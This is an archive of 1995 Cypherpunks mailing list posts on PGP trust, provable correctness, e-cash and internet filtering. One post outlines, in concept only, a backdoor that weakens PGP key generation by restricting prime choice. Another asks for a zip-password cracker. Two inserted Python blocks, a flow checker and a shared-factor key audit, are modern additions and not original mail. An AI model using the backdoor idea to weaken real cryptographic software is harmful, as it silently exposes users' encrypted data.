      dhenson@itsnet.com (Don Henson)

      Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
      West El Paso Information Network (WEPIN)
      Check out The WEPIN Store at URL:
      http://colossus.net/wepinsto/wshome.html

Order it one or two sizes larger than you think that you need 
for a comfortable fit!

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 1 Aug 95 20:27:06 PDT
To: gnu@toad.com
Subject: RE:NRC Panel, Law Enforcement questions
Message-ID: <199508020325.XAA158645@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nice questions, John. To bring executive-branch accountability to a level
more closely approaching absolute zero, the FBI might want a FOIA backlog
of +8 years instead of "only" 5, but from what little I know of FOIA; its 
exceptions, combined with a hostile judiciary (led by Justice Scalia) are 
swallowing most of it anyway, as embarrassment _obviously_ hurts vital U.S.
National Security Interests...[Note: IANAL, and I *am* a bit sarcastic!]

I wonder, and perhaps my kind friend Hadmut can help me here, if there is
an English translation of any and all Nazi-era German laws/regs regarding 
cryptography. As I [dimly] recall, Enigma was born as a private enterprise
and the patent was only later taken over by government and classified after
it was offered for sale to businesses (without much luck). These laws, if
they exist, might make for interesting reading in side-by-side comparison 
with either Sen. Grassley's latest proposals, or with anything regarding 
cryptography coming from our paranoid FBI director.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMB7vC21lp8bpvW01AQE9WQP7BxH6fBTRyxLX3Sw46oYSCbTHKukVC5Hc
Z9nNSC35bazNa5QBCnr7pZjFUBmGXTzs4/NE2uyPbp34d3ojVJrgta9n+y8DX5uD
yY4oMignyHGMPscac8OEkUmN+5T5gG1UKYpWv80Qt8sGfpyw3HCHOyE2YYFjpZ1y
X+/ZDHvogj8=
=dJ3T
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 1 Aug 95 21:54:25 PDT
To: cypherpunks@toad.com
Subject: Software Glitch FYI (fwd)
Message-ID: <Pine.3.89.9508012300.A23934-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Aug 95 01:55 EST
From: Dr. Linda D. Thompson - American Justice Federation <lindat@iquest.net>
To: aen!news@iquest.net
Subject: Software Glitch FYI

A Congressman's aide called me today to explain that if you send email to all
the Congressmen's offices at one time, the software at their end causes each
Congressman to receive 50 copies.

Please be sure everyone is aware of this glitch.

To prevent 50 copies from being sent to each Congressman, it is necessary to
break the mailing list into 5-10 addresses at a time.

Every list I've ever received of Congressional Emails has annoying spaces
and formats, so my list doesn't have that.  It can be copied directly into a
nickname box in Eudora or to a Bcc: list on a message.

============================================
Dr. Linda D. Thompson              
American Justice Federation                                               
3850 S. Emerson Avenue, Suite E,  Indianapolis, IN 46203
Telephone: (317) 780-5203      AEN News BBS: (317) 780-5211
Fax: (317) 780-5209                 Orders (Visa/MC) 1-800-749-9939    
Internet: lindat@iquest.net

*******************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 1 Aug 95 21:14:43 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <Pine.SUN.3.91.950802000010.21825D-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young:
| A Foxhole-atheist swears Pat Robertson said last night that his
| new book warns of a "digital cash society" and massive
| theft by cyber-criminals. Did any believer hear this, or 
| know if this is what he prognosticates for e-cash bedevilment?

----- BEGIN EXCERPT -----
The 700 Club, March 8, 1995, 10:00 -- 11:30 AM

[ ... ]

PAT ROBERTSON: OK. Well, ladies and gentlemen, something a little bit 
more serious. You know, the Bible talks about a day when people won't be 
able to buy or sell except having a mark; a mark of what is called the 
beast. It's one of those things in Revelation that keeps coming up. Well, 
as technology increases, we see a little bit -- a little bit more. Now 
we've got digital cash that may be on the way to your wallet, a card you can 
use for any kind of purchase, from health care to road tolls to 
pay-per-view TV. But are there hidden security dangers in this 
computerized wonder card? We've got a special report on this program. You 
don't want to miss it.

[ ... ]

ROBERTSON: Now that man [David Chaum!] is Jewish. I don't know whether 
he's speaking out of Revelations or not, but that is the scenario set 
forth ... in Revelation, that the -- the -- the cards are too -- too 
valuable to be lost, which means that -- that there has to be some other 
identification. And we just were speaking, prior to the program, about 
the possibility of, indeed, a tattoo that would carry -- just tiny little 
dots would carry -- all the information that is needed could be put on 
somebody's hand or wherever. It's -- it's that close, really. ... We've 
got a few years to go, but I -- I -- I -- I'm just -- and -- and the -- 
the -- the justification for all this is, `Well, we can't have people 
dealing drugs.' So let's -- in order to cut the drug dealers, let's take 
away the freedom and privacy of every other human being on the face of 
the earth, and that is a frightening prospect.

[ ... ]

----- END EXCERPT ----

There's more, like an interview with David Chaum and Dave Banisar [EPIC], 
but I've got raw calluses on my hands, so I'm not doing any more typing 
tonight. ;-)

PS to JYA: Communique top secret postal address / telephone facsimile
machine access codes for possible transmittance of relevant sections for
scanning and automatic distribution to the CP list via usual methods? 
Remember to use HyperMIME backchannel DC-net OTP public key MOST SECRET
secret-shared subliminal-signature encoding methods to prevent
intellectual property gestapo from homing in on location of Rebel base,
no? ;-)
--
Michael Handler      | Cypherpunks: Civil Liberty through Complex Mathematics
handler@sub-rosa.com | 
grendel@netaxs.com   | ISO: Midrange good quality violincello, new or used,
Philadelphia, PA     |      full size, with bow and case, in PA/NY/NJ/DE/MD.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 2 Aug 95 00:36:44 PDT
To: John Young <cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <ac4478ee14021004c8be@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 AM 8/2/95, John Young wrote:
>   A Foxhole-atheist swears Pat Robertson said last night that his
>   new book warns of a "digital cash society" and massive
>   theft by cyber-criminals. Did any believer hear this, or know if
>   this is what he prognosticates for e-cash bedevilment?

I didn't see this, but even if I did it's not likely the subtleties of
digital cash societies would be explored.

There is the "digital cash society" we fear as an Orwellian surveillance
society, with all transactions recorded. This is perhaps the future
Robertson fears.

There is the "digital cash society" based on Chaumian schemes and
untraceability, similar to a "hard cash" society without proofs of identity
at every stage, and I suspect Robertson would find much to like about this.

(There are also the implications which Robertson might recoil at, too. :-})

So, hearing that "Pat Robertson is warning against a digital cash society"
is not too worrisome to me. I suspect he means the stuff about Big Brother
tracking us and the Number of the Beast, and so on.

Don't forget he came out strongly against Clipper, early on.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 1 Aug 95 22:44:30 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Provably Correct Crypto?
In-Reply-To: <9508011911.AA11465@all.net>
Message-ID: <Pine.3.89.9508020027.D23934-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 1 Aug 1995, Dr. Frederick B. Cohen was alleged to have blathered:

> Tim May mused:

> > Anything that "reaches out" to external libraries or utilities would then
> > have the vulnerabilities of _those_ libraries and utilities, which may or
> > may not be provably correct themselves. (And the issue of any PRNG being
> > probably correct or not is of course an interesting, and deep, question.)
> > 
> > I do think the issues of modular design and provable correctness--or
> > approximations to it--are interesting ones.
> 
> I think that this issue can generally be addressed by a divide and
> conquer strategy.  Prove that the called routines are correct and
> confined under all possible parameters, do the same for the calling
> routines, do the same for the interaction between them, and I think you
> have it.  This is pretty easy for one or two routines, but when you take
> the OS into account, the C compiler into account, the program itself
> into account, and the external environment into account, you run into
> some serious limitations.  For example, you may (in some cases) have to
> show that under all possible sequences of interrupt timings and stack
> conditions, the system operates correctly (which almost none currently
> do).  Unless you design with this sort of thing in mind, it's very hard
> to demonstrate these properties even for limited subproblems. 
> 

After all your griping over PGP, you spout this?  Have you ever heard of 
Godel's theorem?  I have a phrase for people who peddle their mark of 
approval that a given large program will work: "Snake oil salesman".  In 
the messages which you have scrawled between this and the last on my 
system when I caught up this evening, you have demonstrated the 
fraudulent nature of your business by first claiming that certain 
propositions were "demonstrated", then stating that a graduate student 
was working on "proving" them.

I repeat: Snake Oil Salesman

<PLONK>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 1 Aug 95 22:46:16 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.SUN.3.91.950801220141.3608B-100000@rwd.goucher.edu>
Message-ID: <Pine.3.89.9508020058.E23934-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


I believe that Pat Robertson is not aware of the privacy-enhancing 
capabilities of e-cash.  In a probabilistic sense, he may well be right.

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 1 Aug 95 23:09:46 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: a hole in PGP
In-Reply-To: <Pine.SUN.3.91.950801061213.9088A-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950802020333.25124A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Duncan Frissell wrote:

> 
> 
> On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:
> 
> > Why (specifically) do you think so? Because you claim it? Because the
> > MIT maintainer claims it? You say MIT is not associated with the NSA,
> > but they have historically been funded by the NSA and other federal
> > agencies for work on information security.  Do you really think that the
> 
> Of course MIT was in the NSA's pocket back in 1978 when they mailed me 
> and 3,000 other people a copy of "A Proposal for a Public Key Encryption 
> System" and started this whole Public Key-Private Key thing.  It was all 
> part of a plot.  If they hadn't done that we might all be using stronger 
> systems today.

You forgot the NSA's most recent overt act in the PGP conspiracy:  it 
gets PGP declared a munition, harassing PZ, gets lots of bad press, etc., 
all in order to make Cypherpunks believe that there is no back door, when 
there really  is!

Shhhhhhhhh. Don't let on that you know.  Just go back to Rot-13 encoding.


> DCF


EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 2 Aug 95 01:36:55 PDT
To: nzook@bga.com (Nathan Zook)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <Pine.3.89.9508020027.D23934-0100000@maria.bga.com>
Message-ID: <9508020830.AA25888@all.net>
MIME-Version: 1.0
Content-Type: text


> > I think that this issue can generally be addressed by a divide and
> > conquer strategy.  Prove that the called routines are correct and
> > confined under all possible parameters, do the same for the calling
> > routines, do the same for the interaction between them, and I think you
> > have it.  This is pretty easy for one or two routines, but when you take
> > the OS into account, the C compiler into account, the program itself
> > into account, and the external environment into account, you run into
> > some serious limitations.  For example, you may (in some cases) have to
> > show that under all possible sequences of interrupt timings and stack
> > conditions, the system operates correctly (which almost none currently
> > do).  Unless you design with this sort of thing in mind, it's very hard
> > to demonstrate these properties even for limited subproblems. 
> > 
> 
> After all your griping over PGP, you spout this?  Have you ever heard of 
> Godel's theorem?

I think so.  From my understanding, it basically says that, in the
general system, you can write a legitimate expression that expresses its
own illegitimacy, or in other words that the general system is
incomplete "...in the sense that it fails to provide a proof for every
formula which is true under the interpretation..." (quoted from
"Introduction to Metamathematics" by S.C.  Kleene 1952,...,1980)

But I think you misinterpret this.  This does not mean that no program
can be proven to meet any properties.  It means that, among other
things, there are an infinite number of infinite expressions that cannot
be proven, but it does not mean that a finite expression (e.g., a
typical modern program) cannot be proven to meet all sorts of
properties.

In particular, for certain classes of programs, proofs about the flow of
information are not exceedingly complex to establish.  In general (as
was proven in the early 1980s), tracking information flow in a program
is NP-complete, however, in a program designed to limit information flow
this can be very straightforward (in fact I think it may be linear time
and space).  By proving that information doesn't flow from place to
place, we can essentially prove that information in one place does not
affect information in another place (by information theory), and
therefore greatly reduce the complexity of demonstrating various things
of particular interest to information security - to wit - that item A
doesn't corrupt item B, and that information in item A is not leaked to
item B.

>  I have a phrase for people who peddle their mark of 
> approval that a given large program will work: "Snake oil salesman".

In the case of the http daemon, it is a relatively small program of less
than 80 lines designed to be secure in various ways.  In the case of PGP
it is a relatively larger program that is not designed to be secure.

>  In 
> the messages which you have scrawled between this and the last on my 
> system when I caught up this evening, you have demonstrated the 
> fraudulent nature of your business by first claiming that certain 
> propositions were "demonstrated", then stating that a graduate student 
> was working on "proving" them.

How is it fraudulent to accurately state the facts?

> I repeat: Snake Oil Salesman

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
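
The claim in the reply above, that showing information cannot flow from item A to item B is tractable for a program built to limit flow, can be illustrated with a conservative dependency analysis. This is an added example, not code from the thread or from the http daemon it mentions; the toy statement forms and the variable names (key, out, msg and so on) are assumptions made for the illustration.

```python
# Conservative information-flow check for a toy structured language.
# Statement forms (constructed for this example, not from the thread):
#   ("assign", target, [source_vars])
#   ("if",     [cond_vars], then_block, else_block)
#   ("while",  [cond_vars], body_block)
# For every variable we track the set of initial values that may influence
# it, including implicit flows through branch and loop conditions.

def _lookup(deps, var):
    # A variable not assigned so far depends only on its own initial value.
    return deps.get(var, {var})

def _merge(a, b):
    # Join point: a variable may carry whatever either path gave it.
    return {v: _lookup(a, v) | _lookup(b, v) for v in set(a) | set(b)}

def _guard(deps, cond_vars, pc):
    g = set(pc)
    for c in cond_vars:
        g |= _lookup(deps, c)
    return g

def analyze(block, deps=None, pc=frozenset()):
    """Return {variable: set of initial values that may influence it}."""
    deps = dict(deps or {})
    for stmt in block:
        kind = stmt[0]
        if kind == "assign":
            _, target, sources = stmt
            new = set(pc)                      # implicit flow from enclosing guards
            for s in sources:
                new |= _lookup(deps, s)        # explicit flow from operands
            deps[target] = new
        elif kind == "if":
            _, cond, then_b, else_b = stmt
            g = _guard(deps, cond, pc)
            deps = _merge(analyze(then_b, deps, g), analyze(else_b, deps, g))
        elif kind == "while":
            _, cond, body = stmt
            while True:                        # iterate to a fixpoint; sets only grow
                g = _guard(deps, cond, pc)
                after = _merge(deps, analyze(body, deps, g))
                if after == deps:
                    break
                deps = after
        else:
            raise ValueError("unknown statement: %r" % (kind,))
    return deps

def flows(program, source, sink):
    """True if the initial value of `source` may influence `sink`."""
    return source in _lookup(analyze(program), sink)

# Constructed sample 1: the key never appears in an assignment to `out`,
# yet it leaks through the branch condition (an implicit flow).
LEAKY = [
    ("assign", "tmp", ["key"]),
    ("if", ["tmp"],
        [("assign", "out", ["one"])],
        [("assign", "out", ["zero"])]),
]

# Constructed sample 2: the key is updated, but nothing derived from it
# reaches `out` or any condition that guards a write to `out`.
CONFINED = [
    ("assign", "digest", ["msg"]),
    ("while", ["i"],
        [("assign", "out", ["out", "digest"]),
         ("assign", "i", ["i"])]),
    ("assign", "key", ["key", "seed"]),
]

if __name__ == "__main__":
    print("LEAKY    key -> out:", flows(LEAKY, "key", "out"))
    print("CONFINED key -> out:", flows(CONFINED, "key", "out"))
```

The analysis over-approximates: a reported flow may be spurious, but a reported absence of flow holds for every execution of the toy program.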



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 2 Aug 95 01:38:20 PDT
To: cypherpunks@toad.com
Subject: Re: Provably Correct Crypto?
Message-ID: <9508020832.AA25989@all.net>
MIME-Version: 1.0
Content-Type: text


> I stipulated I didn't want any such garbage, I specifically said
> English summaries are not acceptable and you bombard me with them.
> Yet you won't accept others' opinion of PGP's security, which verbal or
> otherwise, can only be an abstract summary.

The difference between my response to your question and your responses
to my questions is that I tried to answer your questions.

> > > You state that crypto should be proved correct and suggest a technique
> > > otherwise known as formal specification.  I agree, pgp should have
> > > been written in Z-specs.  If you take a course in formal specification
> > > you will soon see the intractability of the technique wrt large
> > > systems.
> > 
> > I didn't say that.  Perhaps you should review what I said before
> > characterizing it.
> 
> piffle! Your words:
> 	"I think that this issue can generally be addressed by a divide
> 	and conquer strategy.  Prove that the called routines are
> 	correct and confined under all possible parameters, do the
> 	same for the calling routines, do the same for the interaction
> 	between them, and I think you have it."

I don't see where I said anything about formal specification here or Z-specs.
It's true that proof of correctness for large systems is a hard problem, and
that is one of the reasons that the secure http daemon is designed to be small.
However, the same has not been shown (as far as I am aware) for many of the
other properties that may be interesting from a security standpoint.

> This sounds like performing a formal analysis to me.  And you didn't
> address the intractability anyway.

Problems worthy of attack, prove their worth by fighting back - Alan Perlis

> > I have shown (not yet proven) certain things.  A graduate student is now
> > working on trying to prove the various properties I believe to be of
> > interest in an automatic theorem prover he is working on.
> 
> The work in automatic theorem proving is ongoing and not limited to
> your grad student or your work.

I never said it was and he is not my grad student.  He is a grad student
who made some comments on the daemons and decided he would be interested
in seeing if some of these properties could be proven.

> > I believe that these things are worth showing (and proving), but you
> > may certainly feel free to disagree with these contentions.
> 
> I said showing by English isn't good enough, proving would be
> fantastic.  I don't believe these issues reside solely with pgp and as
> such you should question computability as a whole before using
> "incomplete specification" in accusing one system to be flawed.

And I told you that we are in the process of, but not finished with, doing
just that.  I never said that any such problems reside solely in PGP.

> > > If you want people on this list to repeat after you "I cannot be
> > > certain there are no compromising bugs or backdoors in X" Then I will
> > > go out on a limb and say everyone here will agree if system X is
> > > sufficiently large.
> > 
> > I don't believe I ever asked anyone on this list to repeat anything. 
> > All I did was ask questions and respond to responses to my questions.
> 
> Your tiresome repetitive question was "Why do you believe X is secure"
> I hereby answer exactly as above "I cannot be certain there are no
> compromising bugs or backdoors in X"

If you are tired of hearing my responses to your comments, there is an
obvious solution.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an264373@anon.penet.fi (Sauroth)
Date: Tue, 1 Aug 95 22:52:36 PDT
To: cypherpunks@toad.com
Subject: pkzip cracking
Message-ID: <9508020518.AA02633@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a utility to crack password encrypted/protected zip 
files?  Or an address to download one?  All replies / flames / 
pointers appreciated.

Sauroth

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Tue, 1 Aug 95 23:14:15 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: A hole in PGP
Message-ID: <301f0cc0.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If I were going to create a hole in PGP, I would create a "bug" in
PGP's key generation process which would limit the primes PGP
chooses to a relatively small subset. Then when I wanted to break,
I would factor by searching this small subset.

I could also try to put a bug in the code that chooses a Random
Idea key, making it choose from a small subset, that again could be
searched.

To put a bug in the idea portion of PGP would be difficult because
people can check if PGP can interoperate with other implementations
of IDEA.

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMB8adfBUQYbUhJh5AQEx3QP9Har9kb9731F/Nzl0p9kMDEhN6YaSmU4D
HZ+Xhcwq8fA1EBZOzszmjG5gI2JZvciaQpA6vV+ZraKCoJljXB0Ud0AuRwJnxbSq
K4gvmev2Hgi3soE1HWsF/ODmiO4be+haxfDrTYDNjVDP56XL1LH2Lxysx1cqrVqt
DRZ4l0480PE=
=eLP9
-----END PGP SIGNATURE-----
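
A key-generation audit that would expose the kind of defect described in the message above (primes drawn from too small a set): keys from such a generator end up sharing prime factors, which a pairwise GCD over their public moduli reveals. This is an added example, not PGP code; the toy generator, its 64-bit prime size, the pool size of 8 and the seed are assumptions chosen so that it runs quickly.

```python
import math
import random

_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def is_prime(n):
    """Miller-Rabin; this base set is deterministic for all n below 2**64."""
    if n < 2:
        return False
    for p in _MR_BASES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(rng, bits):
    """Draw odd candidates with the top bit set until one is prime."""
    while True:
        c = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_prime(c):
            return c

def make_keygen(rng, bits=64, pool_size=None):
    """Toy RSA modulus generator (hypothetical, for the audit below).

    pool_size=None models a healthy generator that draws fresh primes;
    an integer models the defect: every prime comes from a small fixed pool.
    """
    pool = [random_prime(rng, bits) for _ in range(pool_size)] if pool_size else None

    def keygen():
        if pool is None:
            p = random_prime(rng, bits)
            q = random_prime(rng, bits)
            while q == p:
                q = random_prime(rng, bits)
        else:
            p, q = rng.sample(pool, 2)
        return p * q

    return keygen

def audit_moduli(moduli):
    """Return (i, j, g) for every pair of moduli with a common factor g > 1.

    Independent keys from a sound generator should never share a factor, so
    any finding means the generator's prime space is too small or repeating.
    """
    findings = []
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = math.gcd(moduli[i], moduli[j])
            if g > 1:
                findings.append((i, j, g))
    return findings

def demo(seed=1995, keys=20):
    """Audit a batch from each generator; returns (weak_findings, healthy_findings)."""
    rng = random.Random(seed)          # fixed seed: constructed, repeatable sample
    weak = make_keygen(rng, pool_size=8)
    healthy = make_keygen(rng)
    weak_batch = [weak() for _ in range(keys)]
    healthy_batch = [healthy() for _ in range(keys)]
    return audit_moduli(weak_batch), audit_moduli(healthy_batch)

if __name__ == "__main__":
    weak_hits, healthy_hits = demo()
    print("weak generator, pairs sharing a factor:   ", len(weak_hits))
    print("healthy generator, pairs sharing a factor:", len(healthy_hits))
```

With 20 keys and only 8 primes to draw from, at most four keys can be pairwise free of common primes, so the audit is guaranteed to flag the weak generator.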





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 06:39:52 PDT
To: "David R. Conrad" <ab411@detroit.freenet.org>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508021251.IAA08192@detroit.freenet.org>
Message-ID: <Pine.3.89.9508020831.B3863-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 2 Aug 1995, David R. Conrad wrote:

> 
> 
> Phil Fraering writes:
> >Why are the arguments on either side so emotional?
> 
> I'm rather hesitant to jump into this thread, but I think that one
> reason is that Fred's concerns have been misunderstood a bit.  (If
> I'm wrong, I'm sure he'll correct me.)
> 
> It seems that there are many people who are ready to leap to the
> defense of the honor of the programmers behind PGP, when they feel
> said honor is being impugned.
> 
> I get the impression (as much from what I know of his background as
> from what he's said) that Fred is at least as concerned about PGP
> being a correct implementation of the various algorithms it involves
> as he is about back doors inserted by nefarious individuals.
> 
> As I understand it, it is impossible to demonstrate the correctness of
> any program the size of PGP.  And it would also not be possible to
> validate the compiler or the operating system.  One thing I'm not sure
> of, though, is this: Would it be possible to verify a much smaller
> program, say, the RSA-in-3-lines-of-Perl?  (Of course, you still would
> be left trying to verify the Perl interpreter, and the OS again.)
> 
> And is there any way to build a trusted system out of small, verifiable
> pieces?  Since the way they're connected could also be questioned, I
> suspect that when you put enough of them together it's just as bad as
> the case of a single, monolithic program.  But this isn't my area, so
> I don't know.

No.  This was essentially proved during the first third of this century.

But even if the program itself works, you have to check the OS, the 
motherboard & the processor.  Did I say processor?  Yes, I did.  Anyone 
running on an 80586?

Nathan


> Would it be possible to formally verify at least some parts of a large
> program like PGP?  And would that add to the trustworthiness of the
> overall program?  (Keeping in mind Fred's earlier remark about a
> seemingly-unrelated portion of the code overwriting the key.)
> 
> --
> David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
> Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
> Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
> No, his mind is not for rent to any god or government.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 2 Aug 95 05:52:06 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508021251.IAA08192@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Phil Fraering writes:
>Why are the arguments on either side so emotional?

I'm rather hesitant to jump into this thread, but I think that one
reason is that Fred's concerns have been misunderstood a bit.  (If
I'm wrong, I'm sure he'll correct me.)

It seems that there are many people who are ready to leap to the
defense of the honor of the programmers behind PGP, when they feel
said honor is being impugned.

I get the impression (as much from what I know of his background as
from what he's said) that Fred is at least as concerned about PGP
being a correct implementation of the various algorithms it involves
as he is about back doors inserted by nefarious individuals.

As I understand it, it is impossible to demonstrate the correctness of
any program the size of PGP.  And it would also not be possible to
validate the compiler or the operating system.  One thing I'm not sure
of, though, is this: Would it be possible to verify a much smaller
program, say, the RSA-in-3-lines-of-Perl?  (Of course, you still would
be left trying to verify the Perl interpreter, and the OS again.)

And is there any way to build a trusted system out of small, verifiable
pieces?  Since the way they're connected could also be questioned, I
suspect that when you put enough of them together it's just as bad as
the case of a single, monolithic program.  But this isn't my area, so
I don't know.

Would it be possible to formally verify at least some parts of a large
program like PGP?  And would that add to the trustworthiness of the
overall program?  (Keeping in mind Fred's earlier remark about a
seemingly-unrelated portion of the code overwriting the key.)

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 06:53:05 PDT
To: cypherpunks@toad.com
Subject: NYET--attempted formal specs (again)
Message-ID: <Pine.3.89.9508020848.A4868-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


I hope I'm not becoming Detweileresque about this, but I've had some 
requests for these.  Since not even I was satisfied with my original 
notation, I thought I'd try again...

(donning gear)

-----BEGIN PGP SIGNED MESSAGE-----
 
Copyright 1995, Nathan Zook.  All rights reserved.
 
NYET-- Non-Youths Exhibit Temperance.
 
There is a rising, legitimate concern among parents that their children
have all-too-easy access to porn on the internet.  Last year, there
were numerous proposals for various voluntary self-rating systems.
AOL and Prodigy heavily censor their systems in various ways.  This
year, Senator Exon advanced his own proposal.  Of course, this occurred
just about the time that SurfWatch came out.
 
But none of these proposals can ultimately succeed.  Here I restate my
NYET proposal from last year for your consideration.  The system is of
necessity ISP-based.  Home-based systems are subject to attacks at
home.  Since many (most?) children are better with computers than
their parents, these attacks can be expected to succeed.
 
Any ISP-based system requires that the ISP determine which customers
are not of majority age and who is legally responsible for them.
There are technical solutions to this problem which are part of the
basis to the proposal.
 
The elements of NYET are as follows: the ISP, monitoring software, the
parent/guardian of the minor, and one or more ratings services.
 
A NYET-ISP does not grant access privileges to minors without prior
contact with the (generically) parent of the minor.  This contact
includes explaining and helping configure the NYET software in
accordance with the parent's wishes.
 
The NYET-software runs as superuser on the ISP's machine.  All minor
accounts have a corresponding configuration file sitting in their
account owner's parent's directory, which is locked with read/write by
owner only flags.  The correspondence between minor and parent
accounts sits in a file owned by root and similarly locked.
 
The parent sets the configuration file to permit and deny access to
various parts of the net.  Since it is unreasonable for the parent to
personally "rate" the net, it is expected that various organizations
will form ratings services.  The parent could then select various
combinations of ratings criteria from these agencies as default.  It
is expected that the services would charge for their information.  It
is likely that these charges could be added to the monthly bill that
the parent receives from the ISP.
 
And the role of government?  Right now--none other than to encourage
parental involvement.  Any attempt to force this, or almost any other,
type of restriction by legislative "I say so" (fiat in Latin) will
meet with fatal opposition.  Until the legislature understands the
net, the combined efforts of the millions who use the net will swamp
any efforts to control it.
 
Speaking of government, school internet access is the bane of any
attempt by parents to control the access that their kids have to the
net.  Anyone seeking to limit children's access should look carefully
at this experimentation.
 
I post this proposal because I believe it to be one of the few stable
